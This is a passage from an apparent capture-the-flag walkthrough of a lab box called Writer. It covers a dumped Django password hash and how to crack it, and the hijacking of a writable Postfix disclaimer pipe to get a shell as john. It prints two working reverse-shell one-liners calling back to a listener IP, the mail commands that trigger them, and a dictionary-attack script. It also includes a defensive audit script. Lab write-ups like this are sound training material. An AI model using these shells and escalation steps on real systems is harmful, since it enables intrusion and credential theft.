2 rows in set (0.000 sec)
show tables;
+----------------------------+
| Tables_in_dev |
+----------------------------+
| auth_group |
| auth_group_permissions |
| auth_permission |
| auth_user |
| auth_user_groups |
| auth_user_user_permissions |
| django_admin_log |
| django_content_type |
| django_migrations |
| django_session |
+----------------------------+
10 rows in set (0.000 sec)
select auth_user;
->
MariaDB [dev]> select auth_user;
ERROR 1054 (42S22): Unknown column 'auth_user' in 'field list'
select * from auth_user;
select * from auth_user;
+----+------------------------------------------------------------------------------------------+------------+--------------+----------+------------+-----------+-----------------+----------+-----------+----------------------------+
| id | password | last_login | is_superuser | username | first_name | last_name | email | is_staff | is_active | date_joined |
+----+------------------------------------------------------------------------------------------+------------+--------------+----------+------------+-----------+-----------------+----------+-----------+----------------------------+
| 1 | pbkdf2_sha256$260000$wJO3ztk0fOlcbssnS1wJPD$bbTyCB8dYWMGYlz4dSArozTY7wcZCS7DV6l5dpuXM4A= | NULL | 1 | kyle | | | kyle@writer.htb | 1 | 1 | 2021-05-19 12:41:37.168368 |
+----+------------------------------------------------------------------------------------------+------------+--------------+----------+------------+-----------+-----------------+----------+-----------+----------------------------+
1 row in set (0.000 sec)
This is a Django pbkdf2_sha256 hash (hashcat mode 10000). Cracking it with hashcat and rockyou gives kyle's password, which also works for SSH.
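As an added example (not from the original post), here is how that hash is structured and how a cracker tests candidates against it, using only the Python standard library. The hash from the dump is parsed, but the password search is demonstrated on a constructed hash with a reduced iteration count and a constructed wordlist; the real one belongs in hashcat -m 10000, since 260,000 PBKDF2 rounds per guess is far too slow for a pure-Python loop over rockyou.

```python
"""Django pbkdf2_sha256 hashes: algorithm$iterations$salt$base64(digest).
The digest is PBKDF2-HMAC-SHA256 over the password with the salt as bytes,
which is what hashcat mode 10000 recomputes for every candidate."""
import base64
import hashlib
import hmac


def parse_django_hash(encoded):
    """Split a Django hash into (iterations, salt, raw digest bytes)."""
    algorithm, iterations, salt, b64digest = encoded.split("$", 3)
    if algorithm != "pbkdf2_sha256":
        raise ValueError(f"unsupported algorithm {algorithm!r}")
    return int(iterations), salt, base64.b64decode(b64digest)


def make_django_hash(password, salt, iterations=260000):
    """Build a hash the way Django's PBKDF2PasswordHasher does."""
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), iterations)
    return f"pbkdf2_sha256${iterations}${salt}${base64.b64encode(digest).decode()}"


def check_password(password, encoded):
    """Recompute the digest for a candidate and compare in constant time."""
    iterations, salt, expected = parse_django_hash(encoded)
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), iterations)
    return hmac.compare_digest(candidate, expected)


def dictionary_attack(encoded, wordlist):
    """Return the first word that verifies, or None. This is what a cracker
    does, minus the GPU: one PBKDF2 run per candidate."""
    for word in wordlist:
        if check_password(word, encoded):
            return word
    return None


# Hash dumped from auth_user in the post (parsed only, not cracked here).
KYLE_HASH = "pbkdf2_sha256$260000$wJO3ztk0fOlcbssnS1wJPD$bbTyCB8dYWMGYlz4dSArozTY7wcZCS7DV6l5dpuXM4A="

# Constructed sample: known password, constructed salt, few iterations so the demo is instant.
SAMPLE_HASH = make_django_hash("winter2021", "constructedSalt", iterations=1000)
SAMPLE_WORDLIST = ["password", "123456", "writer", "winter2021", "letmein"]  # constructed

if __name__ == "__main__":
    iters, salt, digest = parse_django_hash(KYLE_HASH)
    print(f"kyle: {iters} iterations, salt {salt!r}, {len(digest)}-byte digest")
    print("sample cracked as:", dictionary_attack(SAMPLE_HASH, SAMPLE_WORDLIST))
```

The iteration count is what makes this hash expensive to attack and is also why hashcat, not a script, is the right tool for the real one; the format itself is not secret, and the salt stops precomputed tables from helping.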
Reverse shell as John
After logging in as kyle, the basic manual privilege-escalation checks come before any automated scripts:
kyle@writer:~$ id
uid=1000(kyle) gid=1000(kyle) groups=1000(kyle),997(filter),1002(smbgroup)
The user belongs to several groups, so the first thing to check is which files each group owns. kyle and smbgroup own a lot of files, smbgroup mostly under /var/www/writer2_project, so some filtering is needed to get to the relevant results:
kyle@writer:~$ find / -group smbgroup 2>/dev/null | wc -l
3915
kyle@writer:~$ find / -group filter 2>/dev/null | wc -l
2
kyle@writer:~$ find / -group kyle 2>/dev/null | wc -l
1124
kyle@writer:~$ find / -group smbgroup 2>/dev/null | grep -v '^/var/www/writer2'
kyle@writer:~$ find / -group kyle 2>/dev/null | grep -v -e '^/run' -e '^/sys' -e '^/proc'
/home/kyle
/home/kyle/user.txt
/home/kyle/.bash_logout
/home/kyle/.cache
/home/kyle/.cache/motd.legal-displayed
/home/kyle/.bashrc
/home/kyle/.profile
kyle@writer:~$ find / -group filter 2>/dev/null
/etc/postfix/disclaimer
/var/spool/filter
Postfix Link to heading
There are some files mentioning Postfix, which is a mail server. Two locations are of interest here.
The /var/spool/filter directory is empty.
kyle@writer:~$ cd /var/spool/filter/
kyle@writer:/var/spool/filter$ ls
kyle@writer:/var/spool/filter$ cd /etc/postfix/
kyle@writer:/etc/postfix$ ls
disclaimer disclaimer.txt dynamicmaps.cf.d main.cf.proto master.cf postfix-files postfix-script sasl
disclaimer_addresses dynamicmaps.cf main.cf makedefs.out master.cf.proto postfix-files.d post-install
Let's review the configuration file to see how it sends mail.
kyle@writer:/etc/postfix$ cat master.cf | tail
flags=F user=ftn argv=/usr/lib/ifmail/ifmail -r $nexthop ($recipient)
bsmtp unix - n n - - pipe
flags=Fq. user=bsmtp argv=/usr/lib/bsmtp/bsmtp -t$nexthop -f$sender $recipient
scalemail-backend unix - n n - 2 pipe
flags=R user=scalemail argv=/usr/lib/scalemail/bin/scalemail-store ${nexthop} ${user} ${extension}
mailman unix - n n - - pipe
flags=FR user=list argv=/usr/lib/mailman/bin/postfix-to-mailman.py
${nexthop} ${user}
dfilt unix - n n - - pipe
flags=Rq user=john argv=/etc/postfix/disclaimer -f ${sender} -- ${recipient}
kyle@writer:/etc/postfix$
The last entry tells us how this transport delivers mail and what checks apply: the dfilt pipe transport runs /etc/postfix/disclaimer as user john, with the sender and recipient passed as arguments. The sender address should be one of the email addresses listed in /etc/postfix/disclaimer_addresses.
dfilt unix - n n - - pipe
flags=Rq user=john argv=/etc/postfix/disclaimer -f ${sender} -- ${recipient}
kyle@writer:/etc/postfix$ cat /etc/postfix/disclaimer_addresses
root@writer.htb
kyle@writer.htb
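The weakness here is a pipe(8) transport whose program file can be edited by a non-root account: whoever can write /etc/postfix/disclaimer runs code as the user= account, john. As an added defender-side example, not part of the original walkthrough, the check below parses master.cf for pipe transports and flags any whose program is not root-owned or is group-/world-writable. The master.cf excerpt and the file mode are constructed samples (fake_stat stands in for os.stat so it runs offline); on a real host pass the default os.stat.

```python
import os
import stat
from typing import Callable, List, NamedTuple
class PipeTransport(NamedTuple):
    service: str   # master.cf service name, e.g. "dfilt"
    user: str      # user= account the program runs as
    program: str   # first word of argv=, the executable pipe(8) runs
def parse_pipe_transports(master_cf: str) -> List[PipeTransport]:
    """Join continuation lines; return every entry whose command (8th column) is 'pipe'."""
    entries: List[str] = []
    for raw in master_cf.splitlines():
        if not raw.strip() or raw.lstrip().startswith("#"):
            continue
        if raw[0] in " \t" and entries:        # indented line continues the previous entry
            entries[-1] += " " + raw.strip()
        else:
            entries.append(raw.strip())
    found = []
    for fields in (e.split() for e in entries):
        if len(fields) >= 8 and fields[7] == "pipe":
            user, program = "", ""
            for tok in fields[8:]:
                if tok.startswith("user="):
                    user = tok[5:].split(":")[0]   # user=name or user=name:group
                elif tok.startswith("argv="):
                    program = tok[5:]              # argv=/path/to/program args...
                    break
            found.append(PipeTransport(fields[0], user, program))
    return found
def audit_pipe_transports(master_cf: str, stat_fn: Callable[[str], os.stat_result] = os.stat) -> List[str]:
    """Flag pipe programs not owned by root or group-/world-writable:
    whoever can edit such a file gets code execution as the user= account."""
    findings = []
    for t in parse_pipe_transports(master_cf):
        try:
            st = stat_fn(t.program)
        except OSError:                            # program missing: nothing runs, skip
            continue
        if st.st_uid != 0 or st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append(f"{t.service}: {t.program} runs as '{t.user}' but is uid {st.st_uid} mode {stat.filemode(st.st_mode)}")
    return findings
# Constructed sample modelled on the box's master.cf tail; the file mode is made up.
SAMPLE_MASTER_CF = """\
dfilt     unix  -       n       n       -       -       pipe
  flags=Rq user=john argv=/etc/postfix/disclaimer -f ${sender} -- ${recipient}
"""
def fake_stat(mode: int, uid: int) -> os.stat_result:   # stand-in for os.stat offline
    return os.stat_result((mode, 0, 0, 1, uid, 997, 0, 0, 0, 0))
SAMPLE_STATS = {"/etc/postfix/disclaimer": fake_stat(0o100775, 0)}  # root:filter, rwxrwxr-x
```

The fix the check points at is the usual one: make the pipe program root-owned and mode 0755 (or run the transport as a dedicated unprivileged user), so that group members like filter cannot change what Postfix executes.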
I have used this script to insert the reverse shell into /etc/postfix/disclaimer and send an email.
echo "bash -c 'bash -i &>/dev/tcp/10.10.14.4/8989 0>&1'" > /etc/postfix/disclaimer && echo -e "HELO writer.htb\nMail From:kyle@writer.htb\nRCPT To: john@writer.htb\nData\nTo: john@writer.htb\nFrom: kyle@writer.htb\nSubject: Testing\nTesting\n." | nc localhost 25
220 writer.htb ESMTP Postfix (Ubuntu)
250 writer.htb
250 2.1.0 Ok
250 2.1.5 Ok
354 End data with <CR><LF>.<CR><LF>
250 2.0.0 Ok: queued as 0B09F137
On the netcat listener, I got the reverse shell:
rlwrap nc -nvlp 8989
listening on [any] 8989 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.11.101] 36994
bash: cannot set terminal process group (6455): Inappropriate ioctl for device
bash: no job control in this shell
cd /home/john/.ssh
ls -al
total 20
drwx------ 2 john john 4096 Jul 9 2021 .
drwxr-xr-x 4 john john 4096 Aug 5 2021 ..
-rw-r--r-- 1 john john 565 Jul 9 2021 authorized_keys
-rw------- 1 john john 2602 Jul 9 2021 id_rsa
-rw-r--r-- 1 john john 565 Jul 9 2021 id_rsa.pub
cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
With the key, we have SSH access. Make sure to change the permissions of the key file to 600 before using it with ssh.
ssh -i id_rsa_john john@10.10.11.101
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sat 18 Jun 01:05:46 UTC 2022
System load: 0.06
Usage of /: 64.1% of 6.82GB
Memory usage: 25%
Swap usage: 0%
Processes: 256
Users logged in: 1
IPv4 address for eth0: 10.10.11.101
IPv6 address for eth0: dead:beef::250:56ff:feb9:5a56
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Wed Jul 28 09:19:58 2021 from 10.10.14.19
john@writer:~$ pwd
/home/john
Alternate method:
Script for sending mail using Python. I got this from a forum and uploaded it [here](Rchitect/sendmail.py at Yoda · tcprks/Rchitect · GitHub).
kyle@writer:~$ cat sendmail.py
import smtplib

hostname = "127.0.0.1"
port = 25                             # SMTP port as an int, not a string
sender_email = "kyle@writer.htb"      # must be one of the addresses in /etc/postfix/disclaimer_addresses
receiver_email = "john@writer.htb"    # Enter receiver address
message = "this is message to john from kyle"

server = None
try:
    server = smtplib.SMTP(hostname, port)
    server.ehlo()                     # Can be omitted; sendmail() sends EHLO/HELO itself
    server.sendmail(sender_email, receiver_email, message)
except Exception as e:
    # Print any error messages to stdout
    print(e)
finally:
    if server is not None:            # quit() would fail if SMTP() itself raised
        server.quit()
Insert the reverse shell command below into /etc/postfix/disclaimer:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.4 1234 >/tmp/f
Then immediately send the mail, and on the netcat listener we have a reverse shell as john.

Since the reverse shell I got does not time out quickly, I downloaded the private key for john and used SSH.

I could see john is part of a group which has privileges over the apt.conf files, which can be exploited as described in a few posts like this.
I ran pspy to see if any cron job related to this was running and found one.

Somehow the commands mentioned on the exploit page above did not work for me.

After some more searching, I tried a similar command after encoding it to base64.

We now have a reverse shell as root.

Key learning Link to heading
The initial shell as kyle can be obtained by brute-forcing as well; however, considering the longer time brute-forcing takes, SQL injection is preferred.
We noticed initially that anonymous SMB share access was not allowed. However, once we got the password cracked through SQL injection, SSH did not work with it. We should remember to try the SMB share with that username and password. This shows that we should keep a note of the services and possible vulnerabilities throughout the exploitation session: initially they may not work, but we need to keep a note of these possible exploits until the end.
The box also teaches the usage of a Python mail script. Similar scripts are available over the internet and can be used in other cases.